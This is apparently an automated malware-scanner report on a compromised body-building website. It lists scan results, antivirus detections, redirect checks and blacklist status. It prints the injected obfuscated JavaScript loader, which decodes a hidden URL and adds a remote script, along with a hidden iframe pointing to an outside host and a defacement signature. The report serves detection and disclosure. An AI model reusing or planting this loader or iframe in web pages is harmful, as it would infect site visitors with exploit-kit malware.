New scan:

Malware Scanner report for body-building-site.org

Malicious/Suspicious/Total urls checked
1/0/6
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked by Dejoui  (4 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://body-building-site.org/
200 OK
Content-Length: 114709
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)


function vdch() {
if(document.all.length > 3) {
var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');
var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
var dch = document.createElement("script");
dch.id = "dchid";
dch.src = dchid;
document.all[3].appendChild(dch);
} else {
setTimeout("vdch()",500);
}
} setTimeout("vdch()",500);

Antivirus reports:

AntiVir
JS/BlacoleRef.A.57
Avast
JS:Redirector-HX [Trj]
Panda
JS/JavaBlacole.A
Rising
Trojan.Script.JS.BlacoleRef.d
nProtect
Exploit.JS.AA
K7AntiVirus
Trojan-Downloader
Emsisoft
Exploit.JS.AA (B)
Comodo
TrojWare.JS.Agent.vdh
McAfee-GW-Edition
JS/Exploit-Blacole.ac
DrWeb
JS.IFrame.155
Kaspersky
Trojan-Downloader.JS.Agent.gfj
Microsoft
Trojan:JS/BlacoleRef.A
Fortinet
JS/Agent.GFJ!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ac
NANO-Antivirus
Trojan.Script.Iframe.eqixo
F-Secure
Exploit.JS.AA
F-Prot
JS/Downldr.CN
AVG
JS/Redir.AY
Norman
Agent.YH
GData
Exploit.JS.AA
Commtouch
JS/Downldr.CN
BitDefender
Exploit.JS.AA

Hidden iFrame found. The same iFrame was found in 7 websites.
size: 2x12     style: hidden
src: http://jl.chura.pl/rc/

<iframe src="http://jl.chura.pl/rc/" style="display:none" width="2" height="12">

Deface/Content modification. The following signature was found: Hacked by Dejoui

...[50181 bytes skipped]...
p;rkey3=&target=_blank&orientation=vertical&desc_len=170&order_by=random&talign=left&tid=&desc_bold=normal&title_bold=bold&isCloak=no&CloakID=www.your_link.com&output=js'></script>
</td>
</tr>
</table> <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>Hacked by Dejoui</title><link href="http://xcruzz.blogspot.com/favicon.ico" rel="SHORTCUT ICON"><meta content="Hacked by Dejoui" name="description"><meta dejoui"="" dejoui,="" by="" hacked="" ,="" content="Hacked by dejoui" name="keywords"><br><div><a href="javascript:void(0)" onclick="window.open('http://mourouj.org');window.open('http://mourouj.org')"><img src="http://www.upislam.com/images/06398466376000619610.jpg" height="447" width="601">&
...[76502 bytes skipped]...


http://s7.addthis.com/js/250/addthis_widget.js
200 OK
Content-Length: 6911
Content-Type: text/javascript
clean
http://affiliateadrotator.com/jquery-latest.js
200 OK
Content-Length: 72191
Content-Type: application/x-javascript
clean
http://affiliateadrotator.com/ads.js
200 OK
Content-Length: 1615
Content-Type: application/x-javascript
clean
http://www.cbadrotator-feed.com/feeds2/gen.php?CID=<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <HaCker By HaCkBoy </title> <meta name="keywords" content="HaCkBoy"> <meta name="description" content="HaCkBoy"> </head> </head> <body bgcolor="
200 OK
Content-Length: 3115
Content-Type: text/html
clean
http://www.cbadrotator-feed.com/test404page.js
404 Not Found
Content-Length: 1363
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: body-building-site.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Oct 2014 19:29:34 GMT
Server: nginx/1.6.2
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: body-building-site.org
Referer: http://www.google.com/search?q=body-building-site.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=body-building-site.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://body-building-site.org/

Result: body-building-site.org is not infected or malware details are not published yet.